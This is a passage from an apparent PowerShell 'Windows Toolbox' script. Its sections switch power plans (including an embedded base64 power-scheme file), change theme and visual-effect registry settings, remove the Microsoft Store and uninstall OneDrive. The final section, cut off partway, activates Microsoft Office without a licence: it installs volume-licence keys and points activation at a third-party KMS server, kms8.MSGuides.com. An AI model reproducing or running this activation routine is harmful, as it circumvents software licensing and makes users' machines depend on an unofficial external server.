Write-Host ""
Write-Host "Set to Balanced mode"
#endregion buttonBalancedMode
#region buttonUltraPowerMode
$powermode1 = Powercfg.exe /L
if("$powermode1" -notmatch "Ultimate")
{
$batmode = Powercfg.exe -duplicatescheme e9a42b02-d5df-448d-aa00-03f14749eb61 > nul
if("$batmode" -notmatch "Ultimate")
{
$ultifilepath = "$env:TEMP" + "\Ultimate_Performance.pow"
$ulticode = "cmVnZgEAAAABAAAABt18K87O0wEBAAAAAwAAAAAAAAABAAAAIAAAAAAQAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHWb0tK/OugRlGAAFV0BfAJ1m9LSvzroEZRgABVdAXwCAAAAAHab0tK/OugRlGAAFV0BfAJybXRtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrL+vUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGhiaW4AAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiP///25rLADWiiJppcPTAQAAAAD/////AgAAAAAAAABoBQAA/////wIAAABoAgAAmAAAAP////9IAAAAAAAAABgAAACyAAAABgAAACQAAABlOWE0MmIwMi1kNWRmLTQ0OGQtYWEwMC0wM2YxNDc0OWViNjEgAAAAEP///3NrAACYAAAAmAAAAAQAAADYAAAAAQAUjMAAAADMAAAAFAAAABwAAAACAAgAAAAAAAIApAAHAAAAABAYABkAAgABAgAAAAAABSAAAAAhAgAAABoYAAAAAIABAgAAAAAABSAAAAAhAgAAABAYABkAAgABAgAAAAAABSAAAAAgAgAAABoYAAAAAIABAgAAAAAABSAAAAAgAgAAABAUAD8ADwABAQAAAAAABRIAAAAAGhQAAAAAEAEBAAAAAAAFEgAAAAAaFAAAAACAAQEAAAAAAAMAAAAAAQEAAAAAAAUSAAAAAQEAAAAAAAUSAAAA2P///3ZrCwCyAAAAsAEAAAIAAAABABu2RGVzY3JpcHRpb24A4tlAaUj///9AACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAFwAcwB5AHMAdABlAG0AMwAyAFwAcABvAHcAcgBwAHIAbwBmAC4AZABsAGwALAAtADEAOAAsAFAAcgBvAHYAaQBkAGUAcwAgAHUAbAB0AGkAbQBhAHQAZQAgAHAAZQByAGYAbwByAG0AYQBuAGMAZQAgAG8AbgAgAGgAaQBnAGgAZQByACAAZQBuAGQAIABQAEMAcwAuAAAAAAXw////iAEAAHgCAAAAAAAA2P///3ZrDAB6AAAAoAIAAAIAAAABAAAARnJpZW5kbHlOYW1lAQEAAID///9AACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAFwAcwB5AHMAdABlAG0AMwAyAFwAcABvAHcAcgBwAHIAbwBmAC4AZABsAGwALAAtADEAOQAsAFUAbAB0AGkAbQBhAHQAZQAgAFAAZQByAGYAbwByAG0AYQBuAGMAZQAAAAAAiP///25rIADWiiJppcPTAQAAAAAgAAAAAQAAAAAAAACABAAA/////wAAAAD/////mAAAAP////9IAAAAAAAAAAAAAAAAAAAAAAAAACQAAAAwMDEyZWU0Ny05MDQxLTRiNWQtOWI3Ny01MzVmYmE4YjE0NDIAAAAAEAAAAGxmAQAgAwAAMDAxMoj///9uayAA1ooiaaXD0wEAAAAAIAMAAAAAAAAAAAAA//////////8CAAAASAQAAJgAAAD/////AAAAAAAAAAAcAAAABAAAAAAAAAAkAAAANjczOGUyYzQtZThhNS00YTQyLWIxNmEtZTA0MGU3Njk3NTZlAQEAANj///92aw4ABAAAgAAAAAAEAAAAAQAAAEFDU2V0dGluZ0luZGV4AADw////IAQAAFgEAAAAAAAA2P///3ZrDgAEAACAAAAAAAQAAAABAAAARENTZXR0aW5nSW5kZXgYAPD///9sZgEAqAMAADY3MziI////bmsgANaKImmlw9MBAAAAACAAAAAAAAAAAAAAAP//////////AgAAADAFAACYAAAA/////wAAAAAAAAAAHAAAAAQAAAABAAAAJAAAADI0NWQ4NTQxLTM5NDMtNDQyMi1iMDI1LTEzYTc4NGY2NzliNyAAAADY////dmsOAAQAAIABAAAABAAAAAEAAABBQ1NldHRpbmdJbmRleAAA8P///wgFAABABQAAAAAAANj///92aw4ABAAAgAIAAAAEAAAAAQAAAERDU2V0dGluZ0luZGV4GADo////bGYCACADAAAwMDEykAQAADI0NWSACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
[IO.File]::WriteAllBytes($ultifilepath, [Convert]::FromBase64String($ulticode))
powercfg.exe -IMPORT $ultifilepath
$A = (powercfg.exe -l | findstr -i Ultimate).split()
Powercfg.exe /S $A[3]
del $ultifilepath
}else{
$A = (powercfg.exe -l | findstr -i Ultimate).split()
Powercfg.exe /S $A[3]
}
}else
{
$A = (powercfg.exe -l | findstr -i Ultimate).split()
Powercfg.exe /S $A[3]
}
Write-Host ""
Write-Host "Set to UltraPower Mode"
#endregion buttonUltraPowerMode
#region buttonDarkMode
Write-Host ""
Write-Host "Switching to Dark Mode"
Set-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name AppsUseLightTheme -Value 0
Write-Host 'Operation Completed' -ForegroundColor green
#endregion buttonDarkMode
#region buttonLightMode
Write-Host ""
Write-Host "Switching to Light Mode"
Remove-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize -Name AppsUseLightTheme
Write-Host 'Operation Completed' -ForegroundColor green
#endregion buttonLightMode
#region buttonFastAnimation
Write-Host ""
Write-Host "Adjusting visual effects for performance..."
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "DragFullWindows" -Type String -Value 0
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "MenuShowDelay" -Type String -Value 200
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name "UserPreferencesMask" -Type Binary -Value ([byte[]](144,18,3,128,16,0,0,0))
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop\WindowMetrics" -Name "MinAnimate" -Type String -Value 0
Set-ItemProperty -Path "HKCU:\Control Panel\Keyboard" -Name "KeyboardDelay" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ListviewAlphaSelect" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ListviewShadow" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "TaskbarAnimations" -Type DWord -Value 0
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" -Name "VisualFXSetting" -Type DWord -Value 3
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\DWM" -Name "EnableAeroPeek" -Type DWord -Value 0
Write-Host 'Operation Completed' -ForegroundColor green
#endregion buttonFastAnimation
#region buttonRemoveMSStore
Write-Host "Removing Microsoft Store"
Get-AppxPackage -Name "*Microsoft.WindowsStore*"| Remove-AppxPackage
#Get-AppxProvisionedPackage -Online | Where-Object DisplayName -like "*Microsoft.WindowsStore*" | Remove-AppxProvisionedPackage -Online
Write-Host "Operation Completed." -ForegroundColor green
#endregion buttonRemoveMSStore
#region buttonUninstallOnedrive
$formWindowsToolbox.WindowState = 1
Write-Host ""
Write-Host "Disabling OneDrive..."
If (!(Test-Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive")) {
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" | Out-Null
}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\OneDrive" -Name "DisableFileSyncNGSC" -Type DWord -Value 1
Write-Host "Uninstalling OneDrive... it can take upto 30 Seconds"
Stop-Process -Name "OneDrive" -ErrorAction SilentlyContinue
Start-Sleep -s 2
$onedrive = "$env:SYSTEMROOT\SysWOW64\OneDriveSetup.exe"
If (!(Test-Path $onedrive)) {
$onedrive = "$env:SYSTEMROOT\System32\OneDriveSetup.exe"
}
Start-Process $onedrive "/uninstall" -NoNewWindow -Wait
Start-Sleep -s 2
Stop-Process -Name "explorer" -ErrorAction SilentlyContinue
Start-Sleep -s 2
Remove-Item -Path "$env:USERPROFILE\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive" -Force -Recurse -ErrorAction SilentlyContinue
Remove-Item -Path "$env:PROGRAMDATA\Microsoft OneDrive" -Force -Recurse -ErrorAction SilentlyContinue
Remove-Item -Path "$env:SYSTEMDRIVE\OneDriveTemp" -Force -Recurse -ErrorAction SilentlyContinue
If (!(Test-Path "HKCR:")) {
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}
Remove-Item -Path "HKCR:\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue
Remove-Item -Path "HKCR:\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" -Recurse -ErrorAction SilentlyContinue
Write-Host "Disabled OneDrive" -ForegroundColor green
$formWindowsToolbox.WindowState = 0
#endregion buttonUninstallOnedrive
#///////////////////////////////////////////#///////////////////////////////////////////#///////////////////////////////////////////#///////////////////////////////////////////
#region buttonActivateMSOffice
$formWindowsToolbox.WindowState = 1
For (){
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
Write-Host @"
>> Please wait...
"@
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
Write-Host ">> Activating Office"
$hiden = ""
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:WFG99
$hiden = cscript //nologo ospp.vbs /unpkey:DRTFM
$hiden = cscript //nologo ospp.vbs /unpkey:BTDRB
$hiden = cscript //nologo ospp.vbs /unpkey:CPQVG
$hiden = cscript //nologo ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Office has been Activated successfully
"@ -ForegroundColor green ; Break
}
Write-Host ">> Fail...! trying Other Options"
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
if (Test-Path "$Env:ProgramFiles(x86)\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles(x86)\Microsoft Office\Office16"}
Write-Host @"
>> Please wait...
"@
cmd.exe /c "(for /f %x in ('dir /b ..\root\Licenses16\ProPlus2019VL*.xrm-ms') do cscript //b ospp.vbs /inslic:'..\root\Licenses16\%x') 2>nul"
Write-Host ">> Activating Office"
$hiden = ""
$hiden = cscript //nologo slmgr.vbs /ckms
$hiden = cscript //nologo ospp.vbs /setprt:1688
$hiden = cscript //nologo ospp.vbs /unpkey:6MWKP
$hiden = cscript //nologo ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
$hiden = cscript //nologo ospp.vbs /sethst:kms8.MSGuides.com
$hiden = cscript //nologo ospp.vbs /act
if($hiden -match "successful"){
Write-Host @"
Microsoft Office has been Activated successfully
"@ -ForegroundColor green ; Break
}
Write-Host ">> Fail...! trying Other Options"
Set-Location C:\Windows\system32
if (Test-Path "$Env:ProgramFiles\Microsoft Office\Office16\ospp.vbs" -PathType leaf){Set-Location "$Env:ProgramFiles\Microsoft Office\Office16"}
